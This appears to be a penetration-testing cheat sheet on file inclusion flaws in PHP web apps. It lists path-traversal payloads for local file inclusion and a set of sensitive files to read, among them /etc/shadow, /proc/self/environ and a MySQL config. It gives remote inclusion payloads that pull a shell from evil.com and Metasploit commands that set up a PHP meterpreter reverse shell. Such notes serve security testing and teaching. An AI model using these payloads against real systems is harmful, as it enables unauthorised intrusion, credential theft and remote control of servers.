๐Ÿ“‚local file inclusion

LFI/RFI - Cheat Sheet

Payloads

Basic LFI

http://example.com/index.php?page=etc/passwd
http://example.com/index.php?page=etc/passwd%00
http://example.com/index.php?page=../../etc/passwd
http://example.com/index.php?page=%252e%252e%252f
http://example.com/index.php?page=....//....//etc/passwd

Interesting Files

/etc/issue
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/mysql/my.cnf
/proc/[0-9]*/fd/[0-9]*   (first number is the PID, second is the filedescriptor)
/proc/self/environ
/proc/version
/proc/cmdline

Basic RFI

http://example.com/index.php?page=http://evil.com/shell.txt
http://example.com/index.php?page=http://evil.com/shell.txt%00
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt

LFI To RCE Via Upload

http://example.com/index.php?page=path/to/uploaded/file.png

Metasploit Module

use exploit/multi/script/web_delivery
set target 1
set lhost <IP>
set srvport <PORT>
set payload php/meterpreter/reverse_tcp
exploit

Metasploit will then generate a payload and you need to add the payload to the vulnerable parameter


REFERENCES

Last updated